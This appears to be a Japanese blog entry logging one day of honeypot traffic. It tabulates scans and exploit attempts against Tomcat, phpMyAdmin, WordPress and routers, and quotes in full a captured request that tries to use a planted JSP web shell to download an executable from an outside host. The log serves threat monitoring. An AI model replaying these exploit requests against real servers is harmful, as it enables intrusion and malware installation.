WOWHoneypot観察(32日目)
2019/04/17(水)
トータルは478件でした。
件数 | 概要 | リクエスト |
---|---|---|
401 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
40 | アクセス | GET / |
14 | 不正中継の調査 | GET hxxp://checkip.dyndns.com/ |
2 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
2 | ZmEuによるphpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
1 | Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) | PUT /FxCodeShell.jsp::$DATA |
1 | Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) | PUT /FxCodeShell.jsp/ |
1 | Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) | PUT /FxCodeShell.jsp%20 |
1 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の通信 | POST /GponForm/diag_Form?images/ |
1 | 不正中継の調査 | GET hxxp://www.ceek.jp/?rands=_89163282009905942922912 |
1 | 不正中継の調査 | GET hxxp://www.baidu.com/?rands=_6654124292017343965806192 |
1 | WordPressの調査 | GET /wp-login.php |
1 | ZmEuによる調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
1 | サイト構成調査 | GET /sitemap.xml |
1 | クローリング | GET /robots.txt |
1 | ZmEuによるphpMyAdminの調査 | GET /pma/scripts/setup.php |
1 | ZmEuによるphpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
1 | ZmEuによるphpMyAdminの調査 | GET /myadmin/scripts/setup.php |
1 | アクセス | GET /favicon.ico |
1 | ZmEuによるphpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
1 | Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) | GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob.se/download.exe |
1 | WordPressの調査 | GET ///wp-json/wp/v2/users/ |
1 | WordPressの調査 | GET ///?author=1 |
1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617)を初めて観測しました。
GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob.se/download.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: hxxp://*.*.*.*:8080/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob.se/download.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: *.*.*.*:8080